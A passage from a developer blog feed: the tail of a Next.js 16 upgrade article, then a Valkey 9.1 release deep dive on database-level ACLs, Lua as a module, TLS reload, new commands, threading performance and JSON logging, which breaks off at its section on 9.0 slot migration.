&lt;p&gt;In one line, Next.js 16 is &lt;strong&gt;"the release that strips away implicit magic — making caching explicit, the bundler fast, and middleware honest."&lt;/strong&gt; Cache Components and &lt;code&gt;use cache&lt;/code&gt; turn caching, once a debugging black box, into an opt-in model where the compiler manages keys. Making Turbopack the default brings build and Fast Refresh acceleration to everyone as a zero-config default. Renaming to &lt;code&gt;proxy.ts&lt;/code&gt; looks small but fixes the mental model that "this file is the network boundary in front of the cache," and the &lt;code&gt;revalidateTag&lt;/code&gt;/&lt;code&gt;updateTag&lt;/code&gt;/&lt;code&gt;refresh&lt;/code&gt; split cleanly separates SWR, read-your-writes, and uncached-refresh intents. 16.2's AI-native turn signals that the framework now treats coding agents as first-class users alongside humans.&lt;/p&gt;

&lt;p&gt;Three things to remember operationally. (1) &lt;strong&gt;Upgrade the runtime first&lt;/strong&gt; — with Node 18 dropped, the runtime is always the first gate of a 16 upgrade. (2) &lt;strong&gt;Treat caching redesign as a separate milestone&lt;/strong&gt; — a plain migration (keeping the default dynamic model) and adopting &lt;code&gt;cacheComponents&lt;/code&gt; are different jobs; don't mix them in one PR. (3) &lt;strong&gt;Measure build-output regressions for the Turbopack switch&lt;/strong&gt; — most things are compatible, but builds depending on custom Webpack plugins should keep a &lt;code&gt;--webpack&lt;/code&gt; safety net and verify gradually during the transition. The shortest one-line recommendation: &lt;em&gt;"This sprint, run the codemod on a dev branch to get the build passing, then merge the proxy.ts rename and the revalidateTag profile additions first."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;ⓘ This article was researched and written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official Next.js 16 release blog (nextjs.org/blog/next-16, Oct 21 2025), the Next.js 16.2 AI Improvements blog (Mar 18 2026), the Next.js 16 upgrade guide, InfoQ's 16 release analysis, and LogRocket's 16 review as primary sources. API signatures, config options, performance figures, and flag names reflect the official docs as of the publish date (2026-05-30) and may change in later patches. Always verify against nextjs.org/docs and GitHub Releases before applying in production. Internal adoption examples are adapted from ManoIT's frontend team's operational procedures.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1481042" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>nextjs</category>
      <category>react</category>
      <category>webdev</category>
      <category>javascript</category>
    </item>
    <item>
      <title>Valkey 9.1 Deep Dive — Database-Level ACLs, Lua-as-a-Module, and a New I/O Threading Model Hitting 2.1M RPS</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Fri, 29 May 2026 00:27:18 +0000</pubDate>
      <link>https://dev.to/x4nent/valkey-91-deep-dive-database-level-acls-lua-as-a-module-and-a-new-io-threading-model-hitting-5an</link>
      <guid>https://dev.to/x4nent/valkey-91-deep-dive-database-level-acls-lua-as-a-module-and-a-new-io-threading-model-hitting-5an</guid>
      <description>&lt;h1&gt;
  
  
  Valkey 9.1 Deep Dive — Database-Level ACLs, Lua-as-a-Module, and a New I/O Threading Model Hitting 2.1M RPS, Plus HGETDEL/MSETEX/CLUSTERSCAN Redefining the 2026 In-Memory Datastore Operations Standard
&lt;/h1&gt;

&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Valkey 9.1.0 (May 19, 2026) is the first minor release after the 9.0 GA, with 80+ contributors hardening security, observability, performance, efficiency, and tooling all at once.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Numbered database-level ACLs&lt;/strong&gt; let you scope a user's permissions to specific databases (&lt;code&gt;db=0,1&lt;/code&gt;), making single-cluster multi-tenant isolation practical.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lua moved to a module&lt;/strong&gt; (&lt;code&gt;libvalkeylua.so&lt;/code&gt;) — pure cache workloads can drop Lua entirely and shrink the attack surface to zero.&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;redesigned I/O threading model&lt;/strong&gt; pushes a single server to &lt;strong&gt;2.1M RPS&lt;/strong&gt; (512-byte payloads, 9 IO threads, pipeline depth 10) and gives up to 17% more throughput.&lt;/li&gt;
&lt;li&gt;New commands &lt;strong&gt;HGETDEL / MSETEX / CLUSTERSCAN&lt;/strong&gt;, &lt;strong&gt;JSON logging&lt;/strong&gt; (&lt;code&gt;log-format json&lt;/code&gt;), main/IO thread usage metrics, and &lt;strong&gt;TLS auto-reload + SAN-URI mTLS&lt;/strong&gt; round it out.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;The Valkey community shipped &lt;strong&gt;Valkey 9.1.0&lt;/strong&gt; on May 19, 2026. Forked from Redis 7.4 under the Linux Foundation after the 2024 Redis license change (SSPL/RSALv2), Valkey crossed from "a Redis-compatible layer" into "a project with its own roadmap" at the 9.0 GA in October 2025. 9.1 builds on that foundation: 80+ contributors advanced security, observability, performance, efficiency, and tooling simultaneously. Compressed into one paragraph: (1) &lt;strong&gt;numbered database-level ACLs&lt;/strong&gt; split per-tenant permissions at db granularity inside a single instance, (2) &lt;strong&gt;Lua scripting moved into its own module&lt;/strong&gt; so you can turn it off entirely when unused, and (3) a &lt;strong&gt;new I/O threading model&lt;/strong&gt; hit &lt;strong&gt;2.1M RPS&lt;/strong&gt; on a single server (512-byte payload, 9 IO threads, pipeline depth 10). Add (4) the &lt;strong&gt;HGETDEL/MSETEX/CLUSTERSCAN&lt;/strong&gt; commands, (5) &lt;strong&gt;JSON logging&lt;/strong&gt; plus main/IO thread usage metrics, and (6) &lt;strong&gt;TLS certificate auto-reload and SAN-URI mTLS&lt;/strong&gt;. This article decomposes the root cause of each change from an operations standpoint, revisits the 9.0 foundation (Atomic Slot Migration, Hash Field Expiration, cluster-mode numbered DBs), and lays out the step-by-step upgrade, validation, and rollback playbook ManoIT applied to its internal cache/session clusters.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why May 2026's Valkey 9.1 matters
&lt;/h2&gt;

&lt;p&gt;Valkey's significance isn't a version number — it's the maturity 18 months after the fork. Right after the fork, the yardstick was "how Redis-compatible is it?" But once 9.0 added features &lt;em&gt;not present in Redis OSS&lt;/em&gt; — Atomic Slot Migration, Hash Field Expiration, cluster-mode numbered DBs — the axis shifted to "the operational value of independent features." 9.1 continues that arc by concentrating on the two most operational areas: &lt;strong&gt;security and observability&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Release / Event&lt;/th&gt;
&lt;th&gt;Operational meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2024.03&lt;/td&gt;
&lt;td&gt;Redis license change → Valkey fork (Redis 7.4 base)&lt;/td&gt;
&lt;td&gt;BSD-3-Clause retained, Linux Foundation governance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024.04&lt;/td&gt;
&lt;td&gt;Valkey 8.0 — multithreaded I/O&lt;/td&gt;
&lt;td&gt;Per-core throughput gains begin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.04&lt;/td&gt;
&lt;td&gt;Valkey 8.1 — Vector Set, I/O improvements&lt;/td&gt;
&lt;td&gt;Vector search / AI workload support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.10.21&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Valkey 9.0 GA — Atomic Slot Migration, Hash Field Expiration, cluster numbered DBs, 1B RPS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Inflection beyond Redis compatibility&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.19&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Valkey 9.1.0 — DB-level ACLs, Lua-as-a-module, new I/O threading (2.1M RPS), HGETDEL/MSETEX/CLUSTERSCAN, JSON logging&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Security/observability/efficiency become operational defaults&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The two operational messages of 9.1: (1) &lt;em&gt;you can solve multi-tenant isolation at db granularity without adding instances&lt;/em&gt; — DB-level ACLs directly cut the cost of instance separation; and (2) &lt;em&gt;observability is now provided directly by the core, without a sidecar&lt;/em&gt; — JSON logging and thread usage metrics absorb gaps you previously filled with exporters and log parsers.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Security — Database-Level ACLs, Lua-as-a-Module, TLS Improvements
&lt;/h2&gt;

&lt;p&gt;In-memory datastores traditionally said "we're fast, but security belongs upstream (app/network policy)." 9.1 re-locks that assumption at the core level.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Numbered database-level ACLs — the new multi-tenant isolation standard
&lt;/h3&gt;

&lt;p&gt;Classic ACLs controlled which commands a user could run and which keys they could touch — but those rules applied to &lt;strong&gt;every database&lt;/strong&gt; identically. Even if you split db 0 and db 5, permissions weren't split, so numbered DBs were hard to use as a multi-tenancy boundary. 9.1 adds a &lt;code&gt;db=&lt;/code&gt; selector to scope a user's permissions to specific databases.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Allow app-user only on db 0 and 1&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; ACL SETUSER app-user on &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;secretpass +@all ~&lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="nv"&gt;db&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0,1
OK
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# After auth, db 0 works&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; SELECT 0
OK
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; SET mykey &lt;span class="s2"&gt;"hello"&lt;/span&gt;
OK

&lt;span class="c"&gt;# db 2 is blocked&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; SELECT 2
&lt;span class="o"&gt;(&lt;/span&gt;error&lt;span class="o"&gt;)&lt;/span&gt; NOPERM No permissions to access database
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The operational payoff is large. The pattern of "one instance (or cluster) per tenant for isolation" can become &lt;strong&gt;per-tenant db + per-db ACL inside a single cluster&lt;/strong&gt; when combined with 9.0's cluster-mode numbered DBs. Fewer instances → less memory overhead and operational burden. Caveat: numbered DBs are &lt;em&gt;logical, not physical&lt;/em&gt; isolation, so for strongly regulated data (PII, payments) keep instance separation as well.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Lua scripting engine moved to a module — attack surface reduction
&lt;/h3&gt;

&lt;p&gt;9.1 extracts the Lua scripting engine from the core server into its own module (&lt;code&gt;libvalkeylua.so&lt;/code&gt;). Running arbitrary Lua via &lt;code&gt;EVAL&lt;/code&gt;/&lt;code&gt;EVALSHA&lt;/code&gt; is powerful but also a well-known attack vector (sandbox escape, resource exhaustion). The point of modularization is &lt;em&gt;"don't load it if you don't need it."&lt;/em&gt; A pure cache workload with no scripting can drop the Lua module and reduce its attack surface to zero. Check which scripting engines are loaded via the new &lt;code&gt;Scripting Engines&lt;/code&gt; section of &lt;code&gt;INFO&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; INFO scripting_engines
&lt;span class="c"&gt;# Scripting Engines&lt;/span&gt;
engine_lua:loaded&lt;span class="o"&gt;=&lt;/span&gt;1,libname&lt;span class="o"&gt;=&lt;/span&gt;libvalkeylua.so
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.3 TLS auto-reload and SAN-URI-based mTLS
&lt;/h3&gt;

&lt;p&gt;9.1 directly tackles two chronic TLS operations pains — "an expired cert nobody noticed caused an outage" and "rotating certs requires a restart."&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Improvement&lt;/th&gt;
&lt;th&gt;Through 9.0&lt;/th&gt;
&lt;th&gt;9.1&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Cert expiry visibility&lt;/td&gt;
&lt;td&gt;External monitoring only&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;INFO&lt;/code&gt; exposes TLS cert expiration dates&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cert rotation&lt;/td&gt;
&lt;td&gt;Restart required (downtime)&lt;/td&gt;
&lt;td&gt;Background auto-reload (zero downtime)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;mTLS identity&lt;/td&gt;
&lt;td&gt;CN-based&lt;/td&gt;
&lt;td&gt;SAN-URI-based authentication&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;SAN-URI authentication integrates directly with workload-identity systems like SPIFFE/SPIRE, simplifying mTLS in service-mesh / zero-trust environments.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. New Commands — HGETDEL / MSETEX / CLUSTERSCAN
&lt;/h2&gt;

&lt;p&gt;9.1 absorbed "common patterns that used to need multiple round trips or a transaction" into single atomic commands.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 HGETDEL — atomically get and delete hash fields
&lt;/h3&gt;

&lt;p&gt;For queue patterns (read data and remove it immediately), you previously had to wrap &lt;code&gt;HGET&lt;/code&gt; + &lt;code&gt;HDEL&lt;/code&gt; in &lt;code&gt;MULTI&lt;/code&gt;. &lt;code&gt;HGETDEL&lt;/code&gt; does it in one shot.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; HSET job:42 status &lt;span class="s2"&gt;"pending"&lt;/span&gt; payload &lt;span class="s1"&gt;'{"action":"send_email"}'&lt;/span&gt; retries &lt;span class="s2"&gt;"3"&lt;/span&gt;
&lt;span class="o"&gt;(&lt;/span&gt;integer&lt;span class="o"&gt;)&lt;/span&gt; 3
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; HGETDEL job:42 FIELDS 2 status payload
1&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"pending"&lt;/span&gt;
2&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"{&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;action&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;:&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;send_email&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;}"&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; HGETALL job:42
1&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"retries"&lt;/span&gt;
2&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"3"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.2 MSETEX — set multiple keys with a shared TTL
&lt;/h3&gt;

&lt;p&gt;Setting many keys with the same TTL used to require multiple &lt;code&gt;SETEX&lt;/code&gt; calls or a &lt;code&gt;SET&lt;/code&gt;+&lt;code&gt;EXPIRE&lt;/code&gt; pipeline. &lt;code&gt;MSETEX&lt;/code&gt; cuts round trips and supports idempotent sets via &lt;code&gt;NX&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Set 3 session keys, all expiring in 3600s&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; MSETEX 3 session:abc &lt;span class="s2"&gt;"user:1"&lt;/span&gt; session:def &lt;span class="s2"&gt;"user:2"&lt;/span&gt; session:ghi &lt;span class="s2"&gt;"user:3"&lt;/span&gt; EX 3600
OK
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; TTL session:abc
&lt;span class="o"&gt;(&lt;/span&gt;integer&lt;span class="o"&gt;)&lt;/span&gt; 3600

&lt;span class="c"&gt;# NX: only set keys that don't already exist&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; MSETEX 2 session:abc &lt;span class="s2"&gt;"user:99"&lt;/span&gt; session:xyz &lt;span class="s2"&gt;"user:4"&lt;/span&gt; NX EX 3600
OK
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; GET session:abc
&lt;span class="s2"&gt;"user:1"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.3 CLUSTERSCAN — cluster-wide key scanning
&lt;/h3&gt;

&lt;p&gt;Iterating all keys in a cluster previously meant clients independently &lt;code&gt;SCAN&lt;/code&gt;-ing each node and merging results. &lt;code&gt;CLUSTERSCAN&lt;/code&gt; offers a single interface to traverse all nodes, with &lt;code&gt;MATCH&lt;/code&gt;/&lt;code&gt;TYPE&lt;/code&gt;/&lt;code&gt;SLOT&lt;/code&gt; filters.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Iterate all cluster keys (repeat until cursor returns 0)&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; CLUSTERSCAN 0
1&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"3"&lt;/span&gt;
2&lt;span class="o"&gt;)&lt;/span&gt; 1&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"user:1001"&lt;/span&gt;
   2&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"user:1002"&lt;/span&gt;
   3&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"session:abc"&lt;/span&gt;

&lt;span class="c"&gt;# Filter by pattern&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; CLUSTERSCAN 0 MATCH &lt;span class="s2"&gt;"session:*"&lt;/span&gt;
&lt;span class="c"&gt;# Filter by type&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; CLUSTERSCAN 0 TYPE &lt;span class="nb"&gt;hash&lt;/span&gt;
&lt;span class="c"&gt;# Scan a specific slot&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; CLUSTERSCAN 0 SLOT 7638
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4. Performance — New I/O Threading Model Hits 2.1M RPS on a Single Server
&lt;/h2&gt;

&lt;p&gt;9.1 pushes single-server throughput to &lt;strong&gt;2.1M RPS&lt;/strong&gt; under &lt;strong&gt;512-byte payloads, 9 IO threads, pipeline depth 10&lt;/strong&gt;. The core change is a redesigned inter-IO-thread communication model.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Improvement&lt;/th&gt;
&lt;th&gt;Detail&lt;/th&gt;
&lt;th&gt;Effect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;New I/O threading model&lt;/td&gt;
&lt;td&gt;Redesigned IO thread communication&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;17%&lt;/strong&gt; higher throughput across workloads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Faster stream ops&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;XRANGE&lt;/code&gt;/&lt;code&gt;XREVRANGE&lt;/code&gt; hot-path optimization&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;30%&lt;/strong&gt; faster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Higher-throughput GETs&lt;/td&gt;
&lt;td&gt;Raised string embedding size threshold&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;30%&lt;/strong&gt; higher for string GET&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Faster sorted-set queries&lt;/td&gt;
&lt;td&gt;Skiplist query processing improvements&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;ZRANGEBYSCORE&lt;/code&gt;/&lt;code&gt;ZRANGEBYLEX&lt;/code&gt; faster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cached COMMAND responses&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;COMMAND&lt;/code&gt; responses are cached&lt;/td&gt;
&lt;td&gt;Shorter client-init connection time&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hardware clock by default&lt;/td&gt;
&lt;td&gt;Less time-syscall overhead&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;3%&lt;/strong&gt; overall GET/SET improvement&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Enabling the hardware clock by default looks minor but is global: it swaps the time lookup that every command makes from a syscall to a hardware counter. Validate monotonic-clock behavior on some virtualized/special environments before rolling out.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Efficiency — Memory Reduction and Rehashing / Bulk-Delete Optimization
&lt;/h2&gt;

&lt;p&gt;As important as throughput is "the same data in less memory." 9.1 delivers meaningful savings on small strings and sorted sets.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Optimization&lt;/th&gt;
&lt;th&gt;Target&lt;/th&gt;
&lt;th&gt;Effect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;String memory reduction&lt;/td&gt;
&lt;td&gt;Strings &amp;lt; 128 bytes (internal pointer optimization)&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;20%&lt;/strong&gt; less memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sorted-set memory reduction&lt;/td&gt;
&lt;td&gt;Skiplist optimization&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;10%&lt;/strong&gt; less memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rehashing performance&lt;/td&gt;
&lt;td&gt;Internal hash-table rehashing on keyspace growth&lt;/td&gt;
&lt;td&gt;Reduced latency impact during rehashing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bulk delete&lt;/td&gt;
&lt;td&gt;Pause resizing during &lt;code&gt;SREM&lt;/code&gt;/&lt;code&gt;ZREM&lt;/code&gt;/&lt;code&gt;HDEL&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Removes needless rehashing → faster bulk deletes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Replica creation&lt;/td&gt;
&lt;td&gt;Reuse received RDB as AOF base when AOF enabled&lt;/td&gt;
&lt;td&gt;No initial snapshot regeneration&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;"20% savings on sub-128-byte strings" is very tangible for services that store huge numbers of small strings — session tokens, flags, short cache values. A cache holding tens of millions of small keys cuts memory cost from the upgrade alone.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. Observability — JSON Logging and Thread Usage Metrics
&lt;/h2&gt;

&lt;p&gt;A long-standing Valkey/Redis ops weakness was "logs are human-readable plain text, awkward for observability tools to parse." 9.1 emits structured logs directly from the core via &lt;code&gt;log-format json&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# valkey.conf&lt;/span&gt;
log-format json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output is one JSON object per line — Loki/Elastic/CloudWatch can parse it immediately without custom grok patterns.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"pid"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;14500&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"role"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"primary"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"timestamp"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"14 May 2026 14:13:02.921"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"level"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"notice"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"message"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"oO0OoO0OoO0Oo Valkey is starting oO0OoO0OoO0Oo"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"pid"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;14500&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"role"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"primary"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"timestamp"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"14 May 2026 14:13:02.928"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"level"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"warning"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"message"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"WARNING: The TCP backlog setting of 511 cannot be enforced..."&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"pid"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;14500&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"role"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"primary"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"timestamp"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"14 May 2026 14:13:02.930"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"level"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"notice"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"message"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"Ready to accept connections tcp"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The other key item is &lt;strong&gt;main/IO thread usage metrics&lt;/strong&gt;. Valkey's threads busy-loop while waiting for work, so CPU can appear near 100% even when relatively idle — plain CPU metrics couldn't reveal true load. 9.1 adds cumulative usage metrics for the main and IO threads so you can measure "how busy is it really?" and tune accordingly. It's a direct basis for deciding whether to add IO threads (scale up).&lt;/p&gt;

&lt;h2&gt;
  
  
  7. Revisiting the 9.0 Foundation — Atomic Slot Migration, Hash Field Expiration, Cluster Numbered DBs
&lt;/h2&gt;

&lt;p&gt;To use 9.1 well you must know the 9.0 foundation beneath it. The three pillars of 9.0 (2025-10-21) tie straight into operational stability.&lt;/p&gt;

&lt;h3&gt;
  
  
  7.1 Atomic Slot Migration — from key-by-key to slot-by-slot
&lt;/h3&gt;

